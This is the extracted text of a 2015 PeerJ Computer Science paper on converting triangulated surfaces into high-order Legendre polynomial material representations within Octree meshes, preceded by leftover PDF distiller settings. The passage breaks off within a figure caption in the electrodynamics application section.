/GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_4vvn36orfzcjbhebqpiwh44nsa ---- Generation of high order geometry representations in Octree meshes Submitted 31 July 2015 Accepted 4 November 2015 Published 25 November 2015 Corresponding author Harald G. Klimach, harald.klimach@uni-siegen.de, harald@klimachs.de Academic editor Feng Gu Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.35 Copyright 2015 Klimach et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Generation of high order geometry representations in Octree meshes Harald G. Klimach, Jens Zudrop and Sabine P. Roller Maschinenbau, University of Siegen, Siegen, Germany ABSTRACT We propose a robust method to convert triangulated surface data into polynomial volume data. Such polynomial representations are required for high-order partial differential solvers, as low-order surface representations would diminish the accuracy of their solution. Our proposed method deploys a first order spatial bisection algorithm to find robustly an approximation of given geometries. The resulting voxelization is then used to generate Legendre polynomials of arbitrary degree. By embedding the locally defined polynomials in cubical elements of a coarser mesh, this method can reliably approximate even complex structures, like porous media. It thereby is possible to provide appropriate material definitions for high order discontinuous Galerkin schemes. We describe the method to construct the polynomial and how it fits into the overall mesh generation. Our discussion includes numerical properties of the method and we show some results from applying it to various geometries. We have implemented the described method in our mesh gener- ator Seeder, which is publically available under a permissive open-source license. Subjects Computer Aided Design, Scientific Computing and Simulation Keywords Polynomial approximation, Discontinuous Galerkin, Mesh generation, High-order INTRODUCTION High-order approximations are attractive for numerical simulations on modern computing systems due to their fast error convergence. They can solve complex problems accurately with few degrees of freedom and therefore, low memory consumption. This is an important property, as memory is an expensive resource in nowadays computing systems. The discontinuous Galerkin finite element method (DGFEM) is a relatively recent numerical scheme, gaining attraction in a wide range of application domains. An introduction and overview is offered by Hesthaven & Warburton (2007). Besides the possibility to use high-order approximations, the local basis definition in DGFEM nicely fits the demands of massively parallel and distributed computing systems. Thus, a high-order DGFEM discretization is a good candidate to solve large scale problems. However, one drawback of high-order methods is the need for appropriate descriptions of geometrical setups in the simulation with the same approximation accuracy as the numerical scheme. We present a method to obtain such a description for inhomogeneous material distributions. Specifically, we consider non-smooth distributions, with a clear interface between distinct material properties. Such variations in material parameters How to cite this article Klimach et al. (2015), Generation of high order geometry representations in Octree meshes. PeerJ Comput. Sci. 1:e35; DOI 10.7717/peerj-cs.35 mailto:harald.klimach@uni-siegen.de mailto:harald@klimachs.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.35 http://dx.doi.org/10.7717/peerj-cs.35 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 appear for example in the field of electrodynamics, and we will use a simple scattering by a cylindrical object to highlight the application of the generated material in a DGFEM solver. Electrodynamics is governed by Maxwell’s equations and with an isotropic, linear material they read: ∇ · (εE) = ρe (1) ∇ · B = 0 (2) ∂ B ∂t + ∇ × E = 0 (3) ∂εE ∂t − ∇ × (B/µ) = −j. (4) Gauss’s law (1) states a direct relation between the divergence of the electrical field E and the electrical charge density ρe. Similarly, the magnetic field B has to be divergence free as there are no magnetic charges, which is expressed in (2). The two fields evolve in time according to Faraday’s (3) and Ampère’s law (4). In these equations, the environment is described by permittivity ε and permeability µ of present materials. Our goal is the conversion of surface descriptions that separate regions of different materials into functions of space ε(x,y,z) and µ(x,y,z). Though, we will only consider Maxwell’s equations in this work, the method is generic and can be used for any partial differential equation with spatially varying material parameters. We consider here a DGFEM with polynomial basis functions, and therefore, generate polynomial representations locally in each element. Geometry identification is tightly related to mesh generation. Therefore, we integrated this method into our meshing tool Seeder (Klimach et al., 2015), which is freely available under an open-source licence. Seeder creates meshes with cubical elements based on an Octree refinement towards boundaries. It uses STL (White, 2013) files to describe boundary surfaces of arbitrary complexity. With the method, we present here, the cubical elements can now be equipped with additional information to provide the spatial distribution of materials within the cubical elements. The fundamental idea to obtain high-order polynomial representations is the use of a simple first-order voxelization within the coarse elements of the mesh for the DGFEM solver. This volume information can then be translated into polynomials by a suitable transformation method. A major feature of the first-order method is its robustness that allows the treatment of complex setups. A drawback is its low accuracy and need for a large number of voxels. However, this is alleviated by using the Octree strategy of recursive refinement. It thereby gets feasible to generate accurate polynomials of high-order for arbitrary surfaces. RELATED WORK Our approach is most closely related to embedded boundaries, as used in spectral discretizations. Examples of such approaches are the Spectral Smoothed Boundary Method (Bueno-Orovio, Pérez-Garćıa & Fenton, 2006) and the Fourier Spectral Embedded Boundaries (Sabetghadam, Sharafatmandjoor & Norouzi, 2009). These methods rely on Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 2/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 a representation of the irregular domain by a function. This function, also referred to as phase-field, is usually constructed with the help of a global rectangular Cartesian grid. We extend this concept with an Octree mesh, where we apply this method in each of the elements of the mesh. The constructed geometry representation is then defined locally within each mesh cell. This matches the function space of the DGFEM and can be directly used by DGFEM solvers. Within the elements, we also make use of the Octree bisection algorithm to achieve a fast voxelization of surfaces. In comparison to a global rectangular domain in spectral methods, the composition of multiple elements in a mesh allows for a greater flexibility in the definition of the embedding domain. By fitting the embedding domain to the actual computational domain of interest, the computational effort can be minimized in this approach. Other methods, where irregular meshes are deployed with an internal geometry representation are typically referred to as Immersed Boundary Methods. Introduced by Peskin (2002) for elastic walls in incompressible flows, this approach has been improved and extended since by various authors. An overview of these methods is for example provided by Mittal & Iaccarino (2005). Similarly to the strategy we follow here, these methods make use of meshes for the computational domain. However, they rely on surface representations to describe objects within the meshes and directly enforce boundary conditions on these. They are popular for flows with moving geometries but do not provide a direct method to describe varying materials, like the change in permeability and permittivity in electrodynamics. In contrast to the embedded boundaries in spectral methods, the immersed boundaries are usually employed in lower order schemes. Our goal is the generation of material representations for high-order DGFEM solvers. As such, we need a mesh like in the immersed boundary methods, but a high-order functional representation of the geometry as in the embedded boundary methods. This method enables the exploitation of the fast convergence of spectral approximations but still allows for complex computational domains. The traditional approach to boundaries in unstructured, irregular meshes is the fitting of the mesh to the geometry. Here, a high-order can be obtained by deforming the elements with curved surfaces. Hindenlang, Bolemann & Munz (2015) offers a method in this direction specifically designed for discontinuous Galerkin discretizations. However, the identification of such curved boundaries is much more complex and usually not used for internal interfaces like material changes, as both sides of the interface need to be considered. Such deformed, unstructured elements are also subject to varying mesh quality and prone to issues with geometrical constraints. As we will show, the embedding description of materials provides a viable and robust approach to the body fitting of meshes. It comes at the cost of volumetric information that needs to be stored but avoids the need for expensive transformations during the simulation. THE SEEDER MESH GENERATOR Seeder (Harlacher et al., 2012) is an Octree mesh generator. It produces voxelizations of complex geometries defined by surface triangulations in the form of STL files. Some Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 3/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 1 Illustration of the voxelization of a sphere within coarse mesh elements. The sphere is indicated by the yellow surface while the thick black lines outline the elements of the actual mesh. The voxelization within elements follows the Octree refinement towards the sphere and is indicated by the thinner white lines. Inside the sphere, voxels have been colorized by the flood-fill mechanism with a seed in the center. Flooded elements are shown in red; other elements are blue. geometric primitives, like spheres and cylinders, are also available, and we will make use of them in the examples considered here. By voxelization, we refer to the process of subdividing a given volume into smaller cubical elements (voxels) in three-dimensional space. With the Octree approach, these cubical elements are successively split into 8 smaller cubes, where needed. An example for the voxelization of a sphere is shown in Fig. 1. The yellow surface indicates the sphere and the red color indicates the voxels completely inside the sphere. Note how the voxels build a staircase that approximates the smooth surface. Also, the Octree refinement is visible in Fig. 1. Our concept of voxels does not imply equally sized voxels. Instead, as outlined by the white lines, different voxel sizes arise from the bisection rule of the Octree approach. Thus, we only need to create a large number of small voxels close to the smooth surface while covering the rest of the volume with just a few large ones. The mesh format generated by Seeder exploits the topology information from the Octree and is designed for the parallel processing on distributed, parallel systems. Seeder is freely available online (Klimach et al., 2015) under a permissive BSD license and has been successfully compiled and run on many computing architectures. In the following section, the general voxelization method is briefly outlined. Afterward, we explain the extensions to enable high-order material definitions within the mesh elements. Basic mesh generation procedure To produce the voxelization, Seeder deploys an approach similar to the building cube method by Ishida, Takahashi & Nakahashi (2008). The basic idea is an iterative refinement towards geometry surfaces, followed by a flooding of the computational domain starting from a user defined seed. This flooding is limited by elements intersected by boundary objects and all flooded elements finally constitute the actual computational domain. For the refinement, a bisection in each direction is used in each step, resulting in an Octree mesh. Such tree structures are well established and widespread in mesh generators to Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 4/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 identify and sort geometrical objects fast, see for example Yerry & Shephard (1984) for an early adoption. In Seeder, each geometry has some refinement level, defined by the user, attached to it. This level describes how many bisection steps should be done to resolve the surface. The higher this level, the smaller the voxels to approximate the surface. Elements are refined iteratively if they intersect a geometry, until the desired resolution is reached. After this step of boundary identification, the actual computational domain is identified by a 3D flood filling algorithm. All elements intersected by a geometry bound this flooding. To avoid unintentional spills, the flooding only the considers the six face neighbors (Von Neumann neighborhood). This mechanism, even though it requires the definition of seeds by the user, is chosen as it provides a high robustness and indifference towards the triangle definitions in STL files. Small inaccuracies in the geometry definition are automatically healed, as long as they are below the resolution of the voxelization. This approach has proven to be robust and applicable to a wide range of complex geometries. GENERATION OF THE POLYNOMIAL GEOMETRY APPROXIMATION The cubical elements obtained by the mesh generation procedure described in the previous section, provide the frame wherein we now can construct the high-order surface representation. We want this representation in the function space of the DGFEM solver, which often are polynomials and in our solver specifically Legendre polynomials. Legendre polynomials build an orthogonal basis with respect to a weight of one on the interval [−1,1], and they adhere to the three-term recurrence relation Li(x) = 2i − 1 i xLi−1(x) − i − 1 i Li−2(x). (5) With L0(x) = 1 and L1(x) = x the higher order polynomials can be recursively computed by (5). The first Legendre polynomial L0(x) = 1 is the only one with an integral mean, all higher ones are mean free on the interval [−1,1]. For material interfaces we usually need to deal with discontinuities as the material property jumps at the interfaces. Thus, we need to project a step function Ξ(x) =  0 if x ≤ ξ 1 if x > ξ (6) to the our polynomial space and find a suitable expansion Pn(x) = n i=0 aiLi(x) (7) that approximates (6). In Fig. 2 such a discontinuity with ξ = 23 in (6) is shown along with its approximation Pn(x) from (7) with various maximal degrees up to n = 15. While in this simple 1D example, the projection can be computed analytically, this is not possible anymore for Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 5/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 2 Projection of a step function (6), jumping at x = 23 onto the space of Legendre polynomi- als. Shown is the step function along with its approximation by more and more Legendre basis functions obtained by analytical integration. higher dimensions with arbitrary jump definitions. We, therefore, introduce an algorithm in this section to find approximations of the projection numerically. However, before polynomials can be computed, the material distribution itself needs to be identified. Namely, we need to find regions of the domain where a specific material should be present. We achieve this by selectively attaching attributes to elements in the mesh. To define, which elements should be attributed and which not, we can exploit the flood filling algorithm explained above by enabling multiple fillings instead of just a single one. Individual surface descriptions confine each flooding, which allows the identification of distinct regions in the mesh. By ascribing a particular material definition to each of these regions, the voxelized spatial material distribution can be obtained. This approach is similar to coloring an image, and we refer to those floodings as colors. In the following, we briefly discuss the coloring concept and then move on to the generation of high-order surface representations within the Octree mesh. Coloring Seeder takes a surface triangulation along with a seed definition to construct the computational domain with non-overlapping cubical elements. The seeds are usually points, but might also be other geometrical objects and are used as the starting point for the flood-filling algorithm. The surface description builds the confinement for the flood-filling. These two parts together are therefore building the volumetric geometry Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 6/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 3 Chart of the overall workflow. Required inputs are the surface descriptions and seeding points to start the flooding. The resulting output is the expansion of the color distribution in Legendre modes for each element. definition in the mesh. By using multiple of such pairs, it gets possible to describe different regions within the same mesh. We refer to this as coloring, and each seed and surface needs to have a color attached to it. The flooding spreads from the seeds and is limited by surfaces of the same color. Boundaries of other colors do not affect the flooding and it is possible to have elements flooded by multiple colors. Differently colored regions might, therefore, overlap. The color information is then attached to the elements and provide a method to distinguish specific areas in the mesh. Afterward, the solver can associate individual material properties to given colors. Sub-resolution With the coloring principle described above, we are now able to define arbitrary material areas, but we still need to obtain high-order surface approximations inside the elements of the Octree. As this provides information beyond the resolution of the actual mesh, we refer to this as sub-resolution. Figure 3 sketches the overall workflow of the algorithm to construct this information. To obtain the sub-resolution as an expansion in Legendre polynomials in each element, we need to perform the following three steps: • Voxelization (and flooding) within elements of the final mesh to identify color distributions • Evaluation of color values at integration points • Transformation of point data to polynomial modes These three steps are indicated by a darker orange color in Fig. 3. The other two processes are already described above. A first step creates the coarse mesh with the desired resolution, and after resolving the surfaces within the elements by the voxelization process, all elements and voxels are flood filled with colors. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 7/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 The first additional step we introduce is the identification of color boundaries inside the coarse mesh elements. Luckily, we already have a robust and fast method to identify color boundaries in volumes by the voxelization method described above for the mesh. We can deploy this mechanism also inside elements and recursively refine the voxels towards surfaces. The final mesh will not contain the voxels within the coarse elements but rather the polynomial approximation of the color distribution. We limit the refinement inside elements by setting the number of additional levels ℓ. This number can be freely chosen in the configuration and all elements intersecting a boundary will be refined accordingly, independent of the size of the coarse element. We observe that even though the voxelization is only a first order approximation, it is feasible to represent the surface accurately due to the exponential nature of the bisection approach in the Octree. After all voxels are known, the mesh generation algorithm proceeds with flooding as described in the previous section. The flood filling does not heed the intersected coarse elements of the final mesh. Instead, all voxels are flooded down to the finest level. With this approach, we do not require a separate algorithm for the flooding of voxels inside intersected elements. Figure 1 illustrates the mesh status after refinement and flooding for eight coarse elements intersected by a sphere. The sphere is indicated by the yellow surface and cut open to reveal the voxelization within. Thick, black lines indicate the coarse mesh elements and the fine white lines show the sub-resolution voxels within them. As described above, elements in the interior of the sphere are flooded, which is indicated by the red coloring. The flooding is limited by the sphere and all voxels outside the geometry are not flooded with this color. Two processes remain to be done at this stage, the evaluation of color values and their transformation to Legendre modes. These two are hard to illustrate in three dimensions, and we will instead make use of the one-dimensional setup in Fig. 4. It makes use of the same target step function Ξ with ξ = 23 , as the one in Fig. 2, but outlines the individual numerical steps we take to arrive at an approximation of the analytical projection. Vertical grid lines indicate the recursive voxelization towards the surface point. We assume the flooding to happen right of the surface, that is, the seed is at some location x > 1. This flooding is indicated by the yellow shaded area in Fig. 4. Thus, the numerical method has to approximate a step function (6) with ξ = 23 , illustrated in the figure by the thick red line. With eight bisections in the voxelization, this results in an approximation of the jump location at ξ̂ = 0.671875. This state corresponds to the three-dimensional case outlined in Fig. 1. The number of additional refinement levels ℓ determines the spatial accuracy of the surface approximation. However, they only build one half of the numerical approximation; the other half is governed by the quality of the polynomial representation that we construct in the final two steps. The accuracy of our polynomial approximation is determined by the number of Chebyshev nodes N at which the color distribution is evaluated. For a given N , Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 8/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 4 Illustration of the approximation method in 1D. For a single element and one discontinuity. The color value jumps from 0 to 1 at x = 23 and is indicated by the red line. The grid lines indicate the bisection sequence and the yellow area highlights the region, where the color value is identified to be 1 by the bisecting approximation. An approximant polynomial of degree 15 is constructed from the 16 shown Chebyshev nodes (black dots). The orange polynomial shows the analytical projection with degree 15, also depicted in Fig. 2. Chebyshev nodes are given by xc = cos  2c − 1 2N π  , c = 1,...,N. (8) Both factors, ℓ and N , can be set independently by the user. However, they both limit the accuracy of the overall approximation, and for optimal results, they need to be correlated. The minimal distance between the first Chebyshev node and the element boundary is proportional to N−2, and the length of the smallest voxel within the element is proportional to 2−ℓ. To resolve all node distances, it is, therefore, necessary to choose the number of additional levels ℓ according to ℓ ≥ ⌈2log2(N)⌉. (9) Once the flooding situation of all voxels is known, we can evaluate the color at each Chebyshev node. For this, numerical values need to be associated with the flooding status for each color. Usually, we assume a value of 1 for flooded voxels and a value of 0 for non-flooded voxels. Due to the spatial discretization by an Octree, the color value at each Chebyshev node xc can be found fast with logarithmic computational complexity. In Fig. 4 Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 9/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 the Chebyshev nodes (8) for N = 16 are indicated by black dots and their color value by the elevation of the dots. The approximated step function provides the color values, and we obtain fc = Ξ(xc) with ξ̂ , c = 1,...,N (10) for the polynomial values at the Chebyshev nodes xc . It is notable that the position of the surface is only significant up to the interval between two neighboring nodes. A variation of the jump location within the interval between two neighboring nodes does not change the final approximation. The only option to increase the accuracy of the approximation is to use a larger number of integration points N . Finally, the transformation of the nodal information (10) to a suitable function space for the solver has to be done. A typical choice for discontinuous Galerkin methods is the orthogonal Legendre basis. To obtain the Legendre modes ai in (7) from the values at the Chebyshev nodes fc in (10), we apply the fast polynomial transformation proposed in Alpert & Rokhlin (1991). However, other target functions with different point sets could also be plugged into the described machinery. The obtained polynomial recovers the function values fc at the nodes exactly and is drawn in Fig. 4 by the black line running through all dots. Due to the discontinuity of the step function, the representation in polynomial space is an infinite series. The finite approximation suffers from the Gibbs phenomenon (Wilbraham, 1848). However, besides this fundamental problem, also inaccuracies due to the numerical integration can be seen as the numerical (black) and the analytical (orange) projections do not coincide in Fig. 4. These result in a distorted location of the jump. In the next section, we will have a closer look at these numerical issues. With this step, we now have a volumetric description that yields a high-order approximation of the surface. Note that only intersected coarse mesh elements need to get this information added, all other elements have constant colors. Thus, the need for volume information is limited to a small area at the surface. NUMERICAL PROPERTIES In this section, we investigate the numerical properties of the described approximation method. Though, the one-dimensional problem with a single jump is much simpler than a real three-dimensional geometry; it is still instructive for the fundamental properties of the algorithm. Let us recall that the goal is an appropriate representation of the geometry in a high-order discontinuous Galerkin solver. Typically, the deployed functions in the solver are smooth within elements. Here we consider specifically Legendre polynomials, which are attractive due to their orthogonality. The representation of a non-smooth material distribution in the finite smooth function space, therefore, can only be approximate. Table 1 shows the convergence behavior for the series of Legendre polynomials, obtained by L2 projections of the step function at x = 23 in the interval [−1,1]. A slow convergence can be observed, which is well known for high-order approximations of discontinuous functions. However, the error outside a small band around the discontinuity can be Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 10/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Table 1 The convergence of the series of Legendre polynomials towards the step function with the jump at x = 23 . Degree L2 -error 0 0.527046 1 0.402538 3 0.226028 7 0.167786 15 0.122322 31 0.086937 63 0.060674 127 0.043065 255 0.030481 511 0.021513 1023 0.015218 2047 0.010763 improved later on by a post-processing step, as shown in Gottlieb & Hesthaven (2001). The error is bound to this band around the discontinuity, and the width of that band decreases with the number of degrees of freedom. While we can compute this analytic projection for the simple setup with a single discontinuity in one dimension, this not possible anymore for multiple dimensions and more complex geometries. Thus, we need the previously described numerical approach to approximate the projection. In the following, we first analyze how well the numerical scheme recovers the optimal solution given by the L2 projection for the simple one-dimensional discontinuity. Figure 5 shows the convergence of the numerical procedure towards the analytical projection onto a polynomial space with a maximal degree of 15. Plotted is the error over the spatial resolution, where the spatial resolution is given by the number of Chebyshev nodes used for the numerical integration. The difference in terms of the L2 norm to the analytical projection is represented by the blue line and covers all modes of the polynomial. With the red line, the absolute difference in the volume is provided. Note that the volume equals to the first mode of the Legendre polynomial and thus, is easily obtained. Nevertheless, the two curves show a similar behavior, and the volume error can be used as a good indicator of the qualitative behavior of this numerical approximation. Apparently, the error does not converge uniformly, but on average we observe a convergence rate of roughly 1. This error is comparable to the one due to the voxelization, and so these two resolutions (number of voxels and number of integration points) should be in the same range. To investigate the mechanism in 3D, we look at three different geometrical objects: a sphere, a cube, and a tetrahedron. In each case the overall domain is a cubical box [−1,1] × [−1,1] × [−1,1] subdivided by 8 cubical elements. The sphere is put in the middle of the domain, with its center at (0,0,0) and has a radius of 13 . Similarly, the cube has an edge length of 23 , and its barycenter is placed at the center of the domain at (0,0,0). Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 11/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 5 Error convergence of the numerical approximation towards the analytical projection for a polynomial of degree 15. The blue line shows the L2-error over all 16 modes while the red line shows the absolute error in the first mode, which represents the volume. On average, a convergence rate of 0.973 is achieved. Keep in mind that in comparison to the actual step function, the error from Table 1 always remains. As a third basic geometry, the tetrahedron again is similarly defined with its barycenter in the center of the domain and an edge length of 1. The error in the volume approximation is used to assess the quality of the polynomial representation. Figure 6 plots this measure for the sphere over the two available parameters voxelization resolution and numerical integration points. It can be observed that the error is mostly bounded by either one of the parameters and for a minimal computational effort it indeed is necessary to change them according to the relation (9). Figure 7 illustrates the projection of the sphere on a 3D polynomial representation in the eight elements of the mesh. From 7A to 7D it shows improved accuracies. In yellow the isosurface of a color value of 0.5 is shown and in comparison the half of the reference sphere is shown in blue. Figure 7A shows the sphere embedded in the eight elements, indicated by the black wireframe. In this, a very rough estimation of the sphere is shown with a polynomial of degree 15 and a low voxelization resolution. Clearly, the staircases from the voxelization are visible in the polynomial representation here. The next image in 7B shows a zoom in for finer voxelization, but still a polynomial degree of 15, in the left half the reference sphere is again depicted in blue. While the finer resolution in the voxelization yields a better approximation now, there are relatively strong oscillations visible, especially close to the element boundaries. To allow for a better representation of the sphere we move Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 12/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 6 Error in the volume approximation for a sphere with a radius of 13 . The mesh consists of 8 elements with a common vertex in the center of the sphere. Figure 7 Illustration of sphere approximations, with increasing accuracy. The sphere is blue, and the isosurface of the color value at 0.5 is yellow. In (A), the sphere is shown in the embedding domain with the 8 elements. Voxelization and integration points increase from (A) to (D). to a polynomial degree of 31 in Fig. 7C. The voxelization is chosen with an appropriate resolution, in this case, but the numerical integration results in aliasing issues, exhibiting a staircase-like effect for the isosurface of the polynomial. Finally, in the Fig. 7D, we see the impact of a higher number of points for the numerical integration, resulting in a much smoother geometry for the shown polynomial of degree 31. Figure 8 illustrates the approximation of a cube. All images show the isosurface for polynomial representation of degree 15, but the accuracy of the numerical approximation increases from left to right. The number of integration points increases from 16 in Fig. 8A over 32 and 48 to 64 in Fig. 8D and the voxelization is chosen according to Eq. (9). Edges and corners get smoothed out, but we observe only little oscillations for this simple, axis aligned, geometry. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 13/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 8 Representation of the cube in 8 elements with polynomials of degree 15. From (A) to (D) an increasing number of integration points is used. Image (D) shows the cube with the 8 elements of the mesh. The reference geometry is drawn in blue, and the isosurface of the color value 0.5 in yellow. We cut the reference in the middle to enable a better view for the comparison, except for image (B) where it is the other way around, and the isosurface is cut. Figure 9 Approximation of the tetrahedron with an increasing polynomial degree from (A) to (D). Starting in (A) with a polynomial degree of 7 and increasing over 15 and 31 to 63 in image (D). Shown is the isosurface of the polynomial at a value of 0.5 in yellow and for comparison the reference geometry cut in half with a blue coloring. Finally, Fig. 9 depicts a study on the 3D polynomial approximation of a tetrahedron. The maximal polynomial degree increases from 7 up to 63, and twice as many integration points as polynomial modes are used in each approximation. We observe that the sharp edges and corners are smoothed out at low orders but are increasingly well recovered in the higher resolved polynomials. Also, oscillations in the planes of the tetrahedron get smaller in amplitude. With a polynomial of degree 63, the original shape is well captured. This shows that a high-order polynomial can nicely be constructed, even for objects with sharp corners and edges. Figure 10 shows the application of the described method to a more complex geometry. Depicted is in yellow the isosurface of a polynomial approximating a porous medium, described by a triangulation in an STL file shown in dark blue. This geometry features small bridges and holes. Those are well recovered by the polynomial approximation; only the edges get a little bit smoothed out. Keep in mind, that we are only using cubical elements, which can be exploited by the numerical scheme. Also, no bad elements arise resulting in an extremely robust mesh generation. APPLICATION IN DGFEM FOR ELECTRODYNAMICS To show the behavior of the obtained geometry, we look at an electrodynamic setting, governed by Eqs. (1)–(4), and solve it with a high-order, modal DGFEM. For time integration, a classical explicit fourth order Runge–Kutta integration is deployed. The Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 14/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 10 Isosurface of a porous medium (yellow) in comparison to the original STL data (blue). The geometry is well recovered; only edges are smoothed out a little. simulation setup is an infinite cylinder, impinged by a planar wave. In this setting, the scattering of the wave can be described by a Mie series (Mie, 1908), which we use as the reference solution. Our simulation setup has the following parameters: • Permittivity and permeability in the surrounding: εS = µS = 1 • Permittivity and permeability in the cylinder: εC = µC = 2 • Simulated domain: [−1,1] × [−1,1] × [0,0.125] • Radius of the cylinder r = 0.21 • Center of the cylinder: (0.0009765625,0.0009765625) • The impinging planar wave has a wave length of λ = 0.25 The domain is discretized with 16 × 16 × 1 = 256 elements, and polynomials with a maximal polynomial degree of 15 are used to represent the solution in each element. For the initial condition of the numerical simulation, we also employ the Mie series. We compare the numerical result with the reference solution after the impinging wave has traveled once by the diameter of the cylinder. In Fig. 11A the instanteneous exact solution for the Z-component of the displacement field D = εE is shown. Right to this reference solution, the difference between the numerical solution and this reference after a simulation time of 0.42 is depicted in Fig. 11B. We use a range in ±10% of the maximal amplitude in the exact solution for the scale of the difference. A de-aliasing is applied in the numerical scheme here. Thus, while the scheme uses 16 modes per direction to represent the solution, we use twice as many modes (32) to compute the multiplication of the material distribution with the solution. In the numerical simulation, no voxelization is employed. Instead, the exact definition of the cylinder is used to determine the material values at the 32 Chebyshev nodes per direction that are used to construct the polynomials with a maximal polynomial degree of 31. This corresponds to ℓ = ∞ with aa = 1 in Table 2. As can be seen, the reference solution is recovered quite accurately in the largest part of the domain. Only close to the actual interface, there are larger deviations observed. Please note that no smoothening post-processing was applied here, and all Gibbs oscillations are visible in the deviations. We now replace the exact definition of the cylindrical geometry by the polynomial representation obtained by the method described above. All other parameters of the numerical setup remain the same. For all simulations, the cylinder geometry is Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 15/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Figure 11 Scattering of a planar wave at a cylindrical object. The grid lines indicate the mesh of the DGFEM solver. For the numerical solution, a basis with a maximal polynomial degree of 15 is used. In (A), the reference solution is shown. In (B), the difference between the numerical solution 